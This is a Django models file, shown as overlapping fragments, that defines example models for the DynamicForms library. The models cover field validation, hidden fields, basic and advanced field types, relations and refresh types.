"lock self.lock = threading.Lock() print('New Runner() {%s}' % self._runner_uuid) def _set_runner_state(self, runner_state, msg=None):",
"RunnerStateTuple = namedtuple('Runner', ['state', 'context', 'msg']) class Runner(threading.Thread, metaclass=ABCMeta): \"\"\"The ``Runner`` base class,",
"seen. This method does nothing if the Runner is already stopping or has",
"STOPPING = auto() # The Runner is stopping - in response to a",
"been a problem END = auto() # The last event, issued when the",
"method must not block. \"\"\" print('End called... {%s}' % self._runner_uuid) if self._stopping: print('Ignoring",
"of the implementing class. self._stopping = True print('End is nigh! {%s}' % self._runner_uuid)",
"end(self): \"\"\"Stops the Runner. This method should be called only of a Runner",
"has stopped - in response to a stop() FAILED = auto() # There",
"_set_runner_state(self, runner_state, msg=None): \"\"\"Sets the runner state and informs the user. :param runner_state:",
"once. This method must not block. \"\"\" assert self._runner_state is None self._set_runner_state(RunnerState.BEGIN) def",
"threading import uuid RUNNER_IMAGE = 'alanbchristie/pydatalister' RUNNER_TAG = 'latest' @unique class RunnerState(Enum): \"\"\"Runner",
"Runner is already stopping or has completed. This method must not block. \"\"\"",
"# The Runner is stopping - in response to a stop() STOPPED =",
"= RunnerStateTuple(runner_state, self._callback_context, msg) self._state_callback(rso, self._callback_context) @abstractmethod def begin(self): \"\"\"Starts the Runner. The",
"= uuid.uuid4() # A synchronisation lock self.lock = threading.Lock() print('New Runner() {%s}' %",
"The normal event sequence, which relates to a runner # that's successfully created,",
"thread to exit - it's # the responsibility of the implementing class. self._stopping",
"Runner. The state_callback will be supplied with instances of the RunnerState as the",
"\"\"\" assert self._runner_state is None self._set_runner_state(RunnerState.BEGIN) def end(self): \"\"\"Stops the Runner. This method",
"exit - it's # the responsibility of the implementing class. self._stopping = True",
"the callback method. assert self._state_callback rso = RunnerStateTuple(runner_state, self._callback_context, msg) self._state_callback(rso, self._callback_context) @abstractmethod",
"# the responsibility of the implementing class. self._stopping = True print('End is nigh!",
"_Runner_ module. \"\"\" from abc import ABCMeta, abstractmethod from collections import namedtuple from",
"Runner state :type runner_state: ``RunnerState \"\"\" assert isinstance(runner_state, RunnerState) self._runner_state = runner_state print('New",
"\"\"\"Runner execution states. \"\"\" # The first event is always BEGIN. # The",
"sequence: # # BEGIN - PREPARING - RUNNING - COMPLETE - END BEGIN",
"Just set the 'stopping' field (and change the state). # This should cause",
"self._runner_uuid) return self._set_runner_state(RunnerState.STOPPING) # Just set the 'stopping' field (and change the state).",
"Runners are derived. \"\"\" def __init__(self, callback, callback_context): \"\"\"The basic Runner initialser. \"\"\"",
"new Runner state :type runner_state: ``RunnerState \"\"\" assert isinstance(runner_state, RunnerState) self._runner_state = runner_state",
"Running COMPLETE = auto() # The Runner has completed its actions (naturally) STOPPING",
"False self._runner_uuid = uuid.uuid4() # A synchronisation lock self.lock = threading.Lock() print('New Runner()",
"import Enum, auto, unique import threading import uuid RUNNER_IMAGE = 'alanbchristie/pydatalister' RUNNER_TAG =",
"begin()) PREPARING = auto() # The Runner is preparing to run RUNNING =",
"self._callback_context) @abstractmethod def begin(self): \"\"\"Starts the Runner. The state_callback will be supplied with",
"the ``RunnerState`` values of ``STOPPING`` and ``STOPPED``, normally not seen. This method does",
"which all Runners are derived. \"\"\" def __init__(self, callback, callback_context): \"\"\"The basic Runner"
] |
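The module above never shows a concrete Runner, so here is a minimal sketch of how a subclass and its state callback could fit together. SleepRunner, on_state, and the timed loop are illustrative assumptions, not part of the source; only the Runner/RunnerState API they call comes from the module itself.

import time

class SleepRunner(Runner):
    """Illustrative Runner whose 'work' is a short, interruptible sleep."""

    def begin(self):
        super().begin()  # emits RunnerState.BEGIN (and enforces single use)
        self.start()     # Runner is a Thread, so this schedules run()

    def run(self):
        self._set_runner_state(RunnerState.PREPARING)
        self._set_runner_state(RunnerState.RUNNING)
        for _ in range(10):
            if self._stopping:
                # end() was called - honour the premature-stop protocol.
                self._set_runner_state(RunnerState.STOPPED)
                break
            time.sleep(0.1)
        else:
            self._set_runner_state(RunnerState.COMPLETE)
        self._set_runner_state(RunnerState.END)

def on_state(rso, context):
    # The receiver gets a RunnerStateTuple as the first argument.
    print('callback: state=%s msg=%s context=%s' % (rso.state, rso.msg, context))

runner = SleepRunner(on_state, callback_context={'job': 42})
runner.begin()
runner.join()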
# Betsy/Betsy/modules/add_md_tags_to_bam_folder.py (from jefftc/changlab)
from Module import AbstractModule


class Module(AbstractModule):
    def __init__(self):
        AbstractModule.__init__(self)

    def run(
        self, network, antecedents, out_attributes, user_options, num_cores,
        out_path):
        import os
        from genomicode import config
        from genomicode import filelib
        from genomicode import parallel
        from genomicode import alignlib
        from Betsy import module_utils

        ## Importing pysam is hard!
        #import sys
        #sys_path_old = sys.path[:]
        #sys.path = [x for x in sys.path if x.find("RSeQC") < 0]
        #import pysam
        #sys.path = sys_path_old

        bam_node, ref_node = antecedents
        bam_filenames = module_utils.find_bam_files(bam_node.identifier)
        assert bam_filenames, "No .bam files."
        ref = alignlib.create_reference_genome(ref_node.identifier)
        filelib.safe_mkdir(out_path)

        # list of (in_filename, err_filename, out_filename)
        jobs = []
        for in_filename in bam_filenames:
            p, f = os.path.split(in_filename)
            s, ext = os.path.splitext(f)
            log_filename = os.path.join(out_path, "%s.log" % s)
            out_filename = os.path.join(out_path, f)
            assert in_filename != out_filename
            x = in_filename, log_filename, out_filename
            jobs.append(x)

        # Don't do this.  Need MD, NM, NH in
        # summarize_alignment_cigar.  To be sure, just redo it.
        ## If the files already have MD tags, then just symlink the
        ## files.  Don't add again.
        #i = 0
        #while i < len(jobs):
        #    in_filename, out_filename = jobs[i]
        #
        #    handle = pysam.AlignmentFile(in_filename, "rb")
        #    align = handle.next()
        #    tag_dict = dict(align.tags)
        #    if "MD" not in tag_dict:
        #        i += 1
        #        continue
        #    # Has MD tags.  Just symlink and continue.
        #    os.symlink(in_filename, out_filename)
        #    del jobs[i]
"sq(out_filename)) commands.append(x) parallel.pshell(commands, max_procs=num_cores) # Make sure the analysis completed successfully. x =",
"Takes ~200 Mb per process, so should not be a big issue. samtools",
"for read # 'ST-J00106:118:H75L3BBXX:3:2128:21846:47014': 0 -> 19 # Pipe stderr to different file.",
"max_procs=num_cores) # Make sure the analysis completed successfully. x = [x[-1] for x",
"\".join(x) x = \"%s 2> %s 1> %s\" % (x, sq(log_filename), sq(out_filename)) commands.append(x)",
"be sure, just redo it. ## If the files already have MD tags,",
"x = \"%s 2> %s 1> %s\" % (x, sq(log_filename), sq(out_filename)) commands.append(x) parallel.pshell(commands,",
"then just symlink the ## files. Don't add again. #i = 0 #while",
"0 #while i < len(jobs): # in_filename, out_filename = jobs[i] # # handle",
"import AbstractModule class Module(AbstractModule): def __init__(self): AbstractModule.__init__(self) def run( self, network, antecedents, out_attributes,",
"commands. # Takes ~200 Mb per process, so should not be a big",
"generate error: # [bam_fillmd1] different NM for read # 'ST-J00106:118:H75L3BBXX:3:2128:21846:47014': 0 -> 19",
"# Make a list of samtools commands. # Takes ~200 Mb per process,",
"= pysam.AlignmentFile(in_filename, \"rb\") # align = handle.next() # tag_dict = dict(align.tags) # if",
"(x, sq(log_filename), sq(out_filename)) commands.append(x) parallel.pshell(commands, max_procs=num_cores) # Make sure the analysis completed successfully.",
"in_filename != out_filename x = in_filename, log_filename, out_filename jobs.append(x) # Don't do this.",
"do this. Need MD, NM, NH in # summarize_alignment_cigar. To be sure, just",
"19 # Pipe stderr to different file. x = [ samtools, \"calmd\", \"-b\",",
"= sys.path[:] #sys.path = [x for x in sys.path if x.find(\"RSeQC\") < 0]",
"should not be a big issue. samtools = filelib.which_assert(config.samtools) sq = parallel.quote commands",
"genomicode import config from genomicode import filelib from genomicode import parallel from genomicode",
"#sys.path = sys_path_old bam_node, ref_node = antecedents bam_filenames = module_utils.find_bam_files(bam_node.identifier) assert bam_filenames, \"No",
"i += 1 # continue # # Has MD tags. Just symlink and",
"parallel from genomicode import alignlib from Betsy import module_utils ## Importing pysam is",
"!= out_filename x = in_filename, log_filename, out_filename jobs.append(x) # Don't do this. Need",
"filelib.safe_mkdir(out_path) # list of (in_filename, err_filename, out_filename) jobs = [] for in_filename in",
"# # Has MD tags. Just symlink and continue. # os.symlink(in_filename, out_filename) #",
"= 0 #while i < len(jobs): # in_filename, out_filename = jobs[i] # #",
"os.path.splitext(f) log_filename = os.path.join(out_path, \"%s.log\" % s) out_filename = os.path.join(out_path, f) assert in_filename",
"already have MD tags, then just symlink the ## files. Don't add again.",
"NH in # summarize_alignment_cigar. To be sure, just redo it. ## If the",
"import module_utils ## Importing pysam is hard! #import sys #sys_path_old = sys.path[:] #sys.path",
"#sys_path_old = sys.path[:] #sys.path = [x for x in sys.path if x.find(\"RSeQC\") <",
"= [x for x in sys.path if x.find(\"RSeQC\") < 0] #import pysam #sys.path",
"handle = pysam.AlignmentFile(in_filename, \"rb\") # align = handle.next() # tag_dict = dict(align.tags) #",
"[bam_fillmd1] different NM for read # 'ST-J00106:118:H75L3BBXX:3:2128:21846:47014': 0 -> 19 # Pipe stderr",
"file. x = [ samtools, \"calmd\", \"-b\", sq(in_filename), sq(ref.fasta_file_full), ] x = \"",
"x = [ samtools, \"calmd\", \"-b\", sq(in_filename), sq(ref.fasta_file_full), ] x = \" \".join(x)",
"genomicode import alignlib from Betsy import module_utils ## Importing pysam is hard! #import",
"import config from genomicode import filelib from genomicode import parallel from genomicode import",
"= sys_path_old bam_node, ref_node = antecedents bam_filenames = module_utils.find_bam_files(bam_node.identifier) assert bam_filenames, \"No .bam",
"# May generate error: # [bam_fillmd1] different NM for read # 'ST-J00106:118:H75L3BBXX:3:2128:21846:47014': 0",
"# i += 1 # continue # # Has MD tags. Just symlink",
"Make a list of samtools commands. # Takes ~200 Mb per process, so",
"AbstractModule class Module(AbstractModule): def __init__(self): AbstractModule.__init__(self) def run( self, network, antecedents, out_attributes, user_options,",
"in # summarize_alignment_cigar. To be sure, just redo it. ## If the files",
"Module(AbstractModule): def __init__(self): AbstractModule.__init__(self) def run( self, network, antecedents, out_attributes, user_options, num_cores, out_path):",
"files. Don't add again. #i = 0 #while i < len(jobs): # in_filename,",
"bam_filenames: p, f = os.path.split(in_filename) s, ext = os.path.splitext(f) log_filename = os.path.join(out_path, \"%s.log\"",
"sq(log_filename), sq(out_filename)) commands.append(x) parallel.pshell(commands, max_procs=num_cores) # Make sure the analysis completed successfully. x",
"import os from genomicode import config from genomicode import filelib from genomicode import",
"module_utils.find_bam_files(bam_node.identifier) assert bam_filenames, \"No .bam files.\" ref = alignlib.create_reference_genome(ref_node.identifier) filelib.safe_mkdir(out_path) # list of",
"jobs = [] for in_filename in bam_filenames: p, f = os.path.split(in_filename) s, ext",
"#while i < len(jobs): # in_filename, out_filename = jobs[i] # # handle =",
"big issue. samtools = filelib.which_assert(config.samtools) sq = parallel.quote commands = [] for x",
"different file. x = [ samtools, \"calmd\", \"-b\", sq(in_filename), sq(ref.fasta_file_full), ] x =",
"<ref.fasta> > <out.bam> # May generate error: # [bam_fillmd1] different NM for read",
"AbstractModule.__init__(self) def run( self, network, antecedents, out_attributes, user_options, num_cores, out_path): import os from",
"self, network, antecedents, out_attributes, user_options, num_cores, out_path): import os from genomicode import config",
"for x in jobs: in_filename, log_filename, out_filename = x # samtools calmd -b",
"= [] for x in jobs: in_filename, log_filename, out_filename = x # samtools",
"in_filename, log_filename, out_filename jobs.append(x) # Don't do this. Need MD, NM, NH in",
"= \" \".join(x) x = \"%s 2> %s 1> %s\" % (x, sq(log_filename),",
"sys.path if x.find(\"RSeQC\") < 0] #import pysam #sys.path = sys_path_old bam_node, ref_node =",
"% s) out_filename = os.path.join(out_path, f) assert in_filename != out_filename x = in_filename,",
"num_cores, out_path): import os from genomicode import config from genomicode import filelib from",
"x # samtools calmd -b <in.bam> <ref.fasta> > <out.bam> # May generate error:",
"MD, NM, NH in # summarize_alignment_cigar. To be sure, just redo it. ##",
"sys #sys_path_old = sys.path[:] #sys.path = [x for x in sys.path if x.find(\"RSeQC\")",
"files.\" ref = alignlib.create_reference_genome(ref_node.identifier) filelib.safe_mkdir(out_path) # list of (in_filename, err_filename, out_filename) jobs =",
"calmd -b <in.bam> <ref.fasta> > <out.bam> # May generate error: # [bam_fillmd1] different",
"symlink the ## files. Don't add again. #i = 0 #while i <",
"sure the analysis completed successfully. x = [x[-1] for x in jobs] filelib.assert_exists_nz_many(x)",
"different NM for read # 'ST-J00106:118:H75L3BBXX:3:2128:21846:47014': 0 -> 19 # Pipe stderr to",
"bam_node, ref_node = antecedents bam_filenames = module_utils.find_bam_files(bam_node.identifier) assert bam_filenames, \"No .bam files.\" ref",
"os.symlink(in_filename, out_filename) # del jobs[i] # Make a list of samtools commands. #",
"parallel.pshell(commands, max_procs=num_cores) # Make sure the analysis completed successfully. x = [x[-1] for",
"tags, then just symlink the ## files. Don't add again. #i = 0",
"jobs[i] # Make a list of samtools commands. # Takes ~200 Mb per",
"commands = [] for x in jobs: in_filename, log_filename, out_filename = x #",
"tag_dict = dict(align.tags) # if \"MD\" not in tag_dict: # i += 1",
"Mb per process, so should not be a big issue. samtools = filelib.which_assert(config.samtools)",
"# Pipe stderr to different file. x = [ samtools, \"calmd\", \"-b\", sq(in_filename),",
"# os.symlink(in_filename, out_filename) # del jobs[i] # Make a list of samtools commands.",
"log_filename = os.path.join(out_path, \"%s.log\" % s) out_filename = os.path.join(out_path, f) assert in_filename !=",
"[ samtools, \"calmd\", \"-b\", sq(in_filename), sq(ref.fasta_file_full), ] x = \" \".join(x) x =",
"from genomicode import filelib from genomicode import parallel from genomicode import alignlib from",
"in_filename, out_filename = jobs[i] # # handle = pysam.AlignmentFile(in_filename, \"rb\") # align =",
"in_filename in bam_filenames: p, f = os.path.split(in_filename) s, ext = os.path.splitext(f) log_filename =",
"# 'ST-J00106:118:H75L3BBXX:3:2128:21846:47014': 0 -> 19 # Pipe stderr to different file. x =",
"2> %s 1> %s\" % (x, sq(log_filename), sq(out_filename)) commands.append(x) parallel.pshell(commands, max_procs=num_cores) # Make",
"# align = handle.next() # tag_dict = dict(align.tags) # if \"MD\" not in",
"per process, so should not be a big issue. samtools = filelib.which_assert(config.samtools) sq",
"to different file. x = [ samtools, \"calmd\", \"-b\", sq(in_filename), sq(ref.fasta_file_full), ] x",
"MD tags. Just symlink and continue. # os.symlink(in_filename, out_filename) # del jobs[i] #",
"sq(ref.fasta_file_full), ] x = \" \".join(x) x = \"%s 2> %s 1> %s\"",
"os.path.join(out_path, f) assert in_filename != out_filename x = in_filename, log_filename, out_filename jobs.append(x) #",
"\"%s 2> %s 1> %s\" % (x, sq(log_filename), sq(out_filename)) commands.append(x) parallel.pshell(commands, max_procs=num_cores) #",
"log_filename, out_filename = x # samtools calmd -b <in.bam> <ref.fasta> > <out.bam> #",
"[] for in_filename in bam_filenames: p, f = os.path.split(in_filename) s, ext = os.path.splitext(f)",
"0 -> 19 # Pipe stderr to different file. x = [ samtools,",
"out_filename = os.path.join(out_path, f) assert in_filename != out_filename x = in_filename, log_filename, out_filename",
"%s 1> %s\" % (x, sq(log_filename), sq(out_filename)) commands.append(x) parallel.pshell(commands, max_procs=num_cores) # Make sure",
"= parallel.quote commands = [] for x in jobs: in_filename, log_filename, out_filename =",
"from genomicode import parallel from genomicode import alignlib from Betsy import module_utils ##",
"bam_filenames, \"No .bam files.\" ref = alignlib.create_reference_genome(ref_node.identifier) filelib.safe_mkdir(out_path) # list of (in_filename, err_filename,",
"os.path.split(in_filename) s, ext = os.path.splitext(f) log_filename = os.path.join(out_path, \"%s.log\" % s) out_filename =",
"ext = os.path.splitext(f) log_filename = os.path.join(out_path, \"%s.log\" % s) out_filename = os.path.join(out_path, f)",
"bam_filenames = module_utils.find_bam_files(bam_node.identifier) assert bam_filenames, \"No .bam files.\" ref = alignlib.create_reference_genome(ref_node.identifier) filelib.safe_mkdir(out_path) #",
"x in sys.path if x.find(\"RSeQC\") < 0] #import pysam #sys.path = sys_path_old bam_node,",
"# Has MD tags. Just symlink and continue. # os.symlink(in_filename, out_filename) # del",
"in tag_dict: # i += 1 # continue # # Has MD tags.",
"] x = \" \".join(x) x = \"%s 2> %s 1> %s\" %",
"-> 19 # Pipe stderr to different file. x = [ samtools, \"calmd\",",
"#sys.path = [x for x in sys.path if x.find(\"RSeQC\") < 0] #import pysam",
"from genomicode import config from genomicode import filelib from genomicode import parallel from",
"add again. #i = 0 #while i < len(jobs): # in_filename, out_filename =",
"= module_utils.find_bam_files(bam_node.identifier) assert bam_filenames, \"No .bam files.\" ref = alignlib.create_reference_genome(ref_node.identifier) filelib.safe_mkdir(out_path) # list",
"import alignlib from Betsy import module_utils ## Importing pysam is hard! #import sys",
"this. Need MD, NM, NH in # summarize_alignment_cigar. To be sure, just redo",
"[] for x in jobs: in_filename, log_filename, out_filename = x # samtools calmd",
"[x for x in sys.path if x.find(\"RSeQC\") < 0] #import pysam #sys.path =",
"from genomicode import alignlib from Betsy import module_utils ## Importing pysam is hard!",
"< len(jobs): # in_filename, out_filename = jobs[i] # # handle = pysam.AlignmentFile(in_filename, \"rb\")",
"in_filename, log_filename, out_filename = x # samtools calmd -b <in.bam> <ref.fasta> > <out.bam>",
"def run( self, network, antecedents, out_attributes, user_options, num_cores, out_path): import os from genomicode",
"a big issue. samtools = filelib.which_assert(config.samtools) sq = parallel.quote commands = [] for",
"process, so should not be a big issue. samtools = filelib.which_assert(config.samtools) sq =",
"\"-b\", sq(in_filename), sq(ref.fasta_file_full), ] x = \" \".join(x) x = \"%s 2> %s",
"alignlib from Betsy import module_utils ## Importing pysam is hard! #import sys #sys_path_old",
"= handle.next() # tag_dict = dict(align.tags) # if \"MD\" not in tag_dict: #",
"jobs[i] # # handle = pysam.AlignmentFile(in_filename, \"rb\") # align = handle.next() # tag_dict",
"f) assert in_filename != out_filename x = in_filename, log_filename, out_filename jobs.append(x) # Don't",
"pysam is hard! #import sys #sys_path_old = sys.path[:] #sys.path = [x for x",
"<in.bam> <ref.fasta> > <out.bam> # May generate error: # [bam_fillmd1] different NM for",
"in sys.path if x.find(\"RSeQC\") < 0] #import pysam #sys.path = sys_path_old bam_node, ref_node",
"again. #i = 0 #while i < len(jobs): # in_filename, out_filename = jobs[i]",
"NM for read # 'ST-J00106:118:H75L3BBXX:3:2128:21846:47014': 0 -> 19 # Pipe stderr to different",
"#import sys #sys_path_old = sys.path[:] #sys.path = [x for x in sys.path if",
"Need MD, NM, NH in # summarize_alignment_cigar. To be sure, just redo it.",
"handle.next() # tag_dict = dict(align.tags) # if \"MD\" not in tag_dict: # i",
"# Don't do this. Need MD, NM, NH in # summarize_alignment_cigar. To be",
"os.path.join(out_path, \"%s.log\" % s) out_filename = os.path.join(out_path, f) assert in_filename != out_filename x",
"\"calmd\", \"-b\", sq(in_filename), sq(ref.fasta_file_full), ] x = \" \".join(x) x = \"%s 2>",
"-b <in.bam> <ref.fasta> > <out.bam> # May generate error: # [bam_fillmd1] different NM",
"i < len(jobs): # in_filename, out_filename = jobs[i] # # handle = pysam.AlignmentFile(in_filename,",
"Make sure the analysis completed successfully. x = [x[-1] for x in jobs]",
"list of (in_filename, err_filename, out_filename) jobs = [] for in_filename in bam_filenames: p,",
"not in tag_dict: # i += 1 # continue # # Has MD",
"May generate error: # [bam_fillmd1] different NM for read # 'ST-J00106:118:H75L3BBXX:3:2128:21846:47014': 0 ->",
"if x.find(\"RSeQC\") < 0] #import pysam #sys.path = sys_path_old bam_node, ref_node = antecedents",
"samtools = filelib.which_assert(config.samtools) sq = parallel.quote commands = [] for x in jobs:",
"= os.path.join(out_path, \"%s.log\" % s) out_filename = os.path.join(out_path, f) assert in_filename != out_filename",
"MD tags, then just symlink the ## files. Don't add again. #i =",
"# continue # # Has MD tags. Just symlink and continue. # os.symlink(in_filename,",
"symlink and continue. # os.symlink(in_filename, out_filename) # del jobs[i] # Make a list",
"# # handle = pysam.AlignmentFile(in_filename, \"rb\") # align = handle.next() # tag_dict =",
"1> %s\" % (x, sq(log_filename), sq(out_filename)) commands.append(x) parallel.pshell(commands, max_procs=num_cores) # Make sure the",
"# summarize_alignment_cigar. To be sure, just redo it. ## If the files already",
"p, f = os.path.split(in_filename) s, ext = os.path.splitext(f) log_filename = os.path.join(out_path, \"%s.log\" %",
".bam files.\" ref = alignlib.create_reference_genome(ref_node.identifier) filelib.safe_mkdir(out_path) # list of (in_filename, err_filename, out_filename) jobs",
"sq(in_filename), sq(ref.fasta_file_full), ] x = \" \".join(x) x = \"%s 2> %s 1>",
"for x in sys.path if x.find(\"RSeQC\") < 0] #import pysam #sys.path = sys_path_old",
"+= 1 # continue # # Has MD tags. Just symlink and continue.",
"out_filename = jobs[i] # # handle = pysam.AlignmentFile(in_filename, \"rb\") # align = handle.next()",
"sys_path_old bam_node, ref_node = antecedents bam_filenames = module_utils.find_bam_files(bam_node.identifier) assert bam_filenames, \"No .bam files.\"",
"## If the files already have MD tags, then just symlink the ##",
"#i = 0 #while i < len(jobs): # in_filename, out_filename = jobs[i] #",
"To be sure, just redo it. ## If the files already have MD",
"(in_filename, err_filename, out_filename) jobs = [] for in_filename in bam_filenames: p, f =",
"= [x[-1] for x in jobs] filelib.assert_exists_nz_many(x) def name_outfile(self, antecedents, user_options): return \"md.bam\"",
"of samtools commands. # Takes ~200 Mb per process, so should not be",
"config from genomicode import filelib from genomicode import parallel from genomicode import alignlib",
"analysis completed successfully. x = [x[-1] for x in jobs] filelib.assert_exists_nz_many(x) def name_outfile(self,",
"__init__(self): AbstractModule.__init__(self) def run( self, network, antecedents, out_attributes, user_options, num_cores, out_path): import os",
"assert in_filename != out_filename x = in_filename, log_filename, out_filename jobs.append(x) # Don't do",
"out_filename x = in_filename, log_filename, out_filename jobs.append(x) # Don't do this. Need MD,",
"x = in_filename, log_filename, out_filename jobs.append(x) # Don't do this. Need MD, NM,",
"and continue. # os.symlink(in_filename, out_filename) # del jobs[i] # Make a list of",
"= dict(align.tags) # if \"MD\" not in tag_dict: # i += 1 #",
"0] #import pysam #sys.path = sys_path_old bam_node, ref_node = antecedents bam_filenames = module_utils.find_bam_files(bam_node.identifier)",
"If the files already have MD tags, then just symlink the ## files."
] |
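The row above windows a Betsy/genomicode module whose job is to guarantee MD/NM tags on every BAM: it shells out to samtools calmd -b <in.bam> <ref.fasta> > <out.bam> once per file (stderr, which can carry warnings such as "[bam_fillmd1] different NM for read ...", is piped to a per-sample .log), runs the commands in parallel, and then asserts that every output exists and is non-empty. Below is a minimal standalone sketch of that step under stated assumptions: it swaps the genomicode helpers (parallel.pshell, filelib.assert_exists_nz_many) for the standard library, and run_calmd, REF_FASTA, and BAM_FILENAMES are hypothetical scaffolding, not names from the original module.

import os
import subprocess
from multiprocessing import Pool

REF_FASTA = "ref.fasta"          # hypothetical reference path
BAM_FILENAMES = ["sample1.bam"]  # hypothetical inputs
OUT_PATH = "md_bams"
NUM_CORES = 4  # calmd takes ~200 Mb per process, so cap the pool size

def run_calmd(job):
    # job mirrors the (in_filename, log_filename, out_filename) tuples
    # built in the fragments above.
    in_filename, log_filename, out_filename = job
    assert in_filename != out_filename
    # samtools calmd writes the rewritten BAM to stdout and its warnings
    # to stderr, so the two streams go to separate files.
    with open(out_filename, "wb") as out, open(log_filename, "w") as log:
        subprocess.run(
            ["samtools", "calmd", "-b", in_filename, REF_FASTA],
            stdout=out, stderr=log, check=True)
    return out_filename

if __name__ == "__main__":
    os.makedirs(OUT_PATH, exist_ok=True)
    jobs = []
    for in_filename in BAM_FILENAMES:
        f = os.path.basename(in_filename)
        s, _ = os.path.splitext(f)
        log_filename = os.path.join(OUT_PATH, "%s.log" % s)
        out_filename = os.path.join(OUT_PATH, f)
        jobs.append((in_filename, log_filename, out_filename))
    with Pool(NUM_CORES) as pool:
        results = pool.map(run_calmd, jobs)
    # Make sure the analysis completed successfully (the original uses
    # filelib.assert_exists_nz_many): every output must be non-empty.
    for out_filename in results:
        assert os.path.getsize(out_filename) > 0, out_filename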
[
"'Only options A-C may be chosen', 'regex') ]) comment = models.TextField(null=True, blank=True) class",
"mask. 1=apartment_number, ..., 32=delay item_type = models.IntegerField(choices=( (0, 'Choice 1'), (1, 'Choice 2'),",
"= models.CharField(max_length=20, help_text='Name field', verbose_name='Name field', null=True, blank=True) class BasicFields(models.Model): \"\"\" Shows basic",
"its source primary_key_related_field = models.OneToOneField( Relation, on_delete=models.CASCADE, null=True, related_name='primary' ) slug_related_field = models.ForeignKey(",
"= models.IntegerField(null=True) nullint_field = models.IntegerField(null=True, blank=True) float_field = models.FloatField(null=True) decimal_field = models.DecimalField(null=True, max_digits=5,",
"), null=True, blank=True) int_fld = models.IntegerField(verbose_name='Quantity', null=True, blank=True) qty_fld = models.FloatField(verbose_name='Weight', null=True, blank=True,",
"related_name='hyper_identity' ) def __str__(self): return 'Advanced field {self.id}'.format(**locals()) class RefreshType(models.Model): \"\"\" Shows how",
"field with choices', verbose_name='Integer field with choices') bool_field = models.BooleanField(help_text='Boolean field', verbose_name='Boolean field')",
"model_field = models.? # Relations # string_related_field, which is always read_only is defined",
"be chosen', 'regex') ]) comment = models.TextField(null=True, blank=True) class HiddenFields(models.Model): \"\"\" Shows dynamically",
"be interesting: will a blank value pass the Min validator? It should! MinValueValidator(5),",
"string starting with two characters, followed by up to 8 numbers') ]) enabled",
"choice_field = models.CharField(null=True, max_length=8) single_choice_field = models.CharField(null=True, max_length=8) multiplechoice_field = models.CharField(null=True, max_length=8) filepath_field",
"blank=True, help_text='Now that you have shown me, please enter something') class PageLoad(models.Model): \"\"\"",
"models.FileField(upload_to='examples2/', null=True, blank=True) image_field = models.ImageField(upload_to='examples/', null=True, blank=True) # Model attribute for ReadOnlyField",
"(0, 'Choice 1'), (1, 'Choice 2'), (2, 'Choice 3'), (3, 'Choice 4'), ))",
"Model attribute for ReadOnlyField hidden_field = models.DateTimeField(default=timezone.now) @property def readonly_field(self): return self.hidden_field >",
"many records in ViewSet result \"\"\" description = models.CharField(max_length=20, help_text='Item description') choice =",
"bool_field = models.BooleanField(help_text='Boolean field', verbose_name='Boolean field') name = models.CharField(max_length=20, help_text='Name field', verbose_name='Name field',",
"import timezone class Validated(models.Model): \"\"\" Shows validation capabilities \"\"\" code = models.CharField(max_length=10, validators=[",
"model \"\"\" name = models.CharField(max_length=16) def __str__(self): return self.name class AdvancedFields(models.Model): \"\"\" Shows",
"different refresh types \"\"\" description = models.CharField(max_length=20, help_text='Item description') rich_text_field = models.TextField(blank=True, null=True)",
"Relations # string_related_field, which is always read_only is defined only in serializer #",
"to 8 numbers') ]) enabled = models.BooleanField() amount = models.IntegerField(null=True, blank=True, validators=[ #",
"class RefreshType(models.Model): \"\"\" Shows how DynamicForms handles different refresh types \"\"\" description =",
"image_field = models.ImageField(upload_to='examples/', null=True, blank=True) # Model attribute for ReadOnlyField hidden_field = models.DateTimeField(default=timezone.now)",
"serializer_method_field = models.? # model_field = models.? # Relations # string_related_field, which is",
"\"\"\" Shows how DynamicForms handles filers \"\"\" char_field = models.CharField(max_length=20, help_text='Char field', verbose_name='Char",
"source primary_key_related_field = models.OneToOneField( Relation, on_delete=models.CASCADE, null=True, related_name='primary' ) slug_related_field = models.ForeignKey( Relation,",
"date_field = models.DateField(null=True) time_field = models.TimeField(null=True) duration_field = models.DurationField(null=True) password_field = models.CharField(null=True, max_length=32)",
"# list_field = models.? # dict_field = models.? \"\"\"JSONField available only for PostgreSQL\"\"\"",
") slug_related_field = models.ForeignKey( Relation, on_delete=models.CASCADE, null=True, related_name='slug' ) hyperlinked_related_field = models.ManyToManyField( Relation,",
"fields in DynamicForms \"\"\" regex_field = models.CharField(max_length=256) choice_field = models.CharField(null=True, max_length=8) single_choice_field =",
"by up to 8 numbers') ]) enabled = models.BooleanField() amount = models.IntegerField(null=True, blank=True,",
"may be chosen', 'regex') ]) comment = models.TextField(null=True, blank=True) class HiddenFields(models.Model): \"\"\" Shows",
"models.TimeField(null=True) duration_field = models.DurationField(null=True) password_field = models.CharField(null=True, max_length=32) class Relation(models.Model): \"\"\" Model related",
"__str__(self): return 'Advanced field {self.id}'.format(**locals()) class RefreshType(models.Model): \"\"\" Shows how DynamicForms handles different",
"'Advanced field {self.id}'.format(**locals()) class RefreshType(models.Model): \"\"\" Shows how DynamicForms handles different refresh types",
"null=True, blank=True) file_field_two = models.FileField(upload_to='examples2/', null=True, blank=True) image_field = models.ImageField(upload_to='examples/', null=True, blank=True) #",
"import models from django.utils import timezone class Validated(models.Model): \"\"\" Shows validation capabilities \"\"\"",
"null=True, blank=True) class BasicFields(models.Model): \"\"\" Shows basic available fields in DynamicForms \"\"\" boolean_field",
"field') datetime_field = models.DateTimeField(help_text='Datetime field', verbose_name='Datetime field') int_field = models.IntegerField(help_text='Integer field', verbose_name='Integer field')",
"= models.CharField(max_length=16) def __str__(self): return self.name class AdvancedFields(models.Model): \"\"\" Shows advanced available fields",
"field') unit = models.CharField(max_length=10, choices=( (None, 'No additional data'), ('pcs', 'Pieces'), ('wt', 'Weight'),",
"validators=[ # This one should be interesting: will a blank value pass the",
"'Please enter a string starting with two characters, followed by up to 8",
"filers \"\"\" char_field = models.CharField(max_length=20, help_text='Char field', verbose_name='Char field') datetime_field = models.DateTimeField(help_text='Datetime field',",
"char_field = models.CharField(null=True, max_length=32) email_field = models.EmailField(null=True) slug_field = models.SlugField(null=True) url_field = models.URLField(null=True)",
"1'), (1, 'Choice 2'), (2, 'Choice 3'), (3, 'Choice 4'),), help_text='Integer field with",
"which is always read_only is defined only in serializer # and primary_key_related_field is",
"models.UUIDField(null=True) ipaddress_field = models.GenericIPAddressField(null=True) integer_field = models.IntegerField(null=True) nullint_field = models.IntegerField(null=True, blank=True) float_field =",
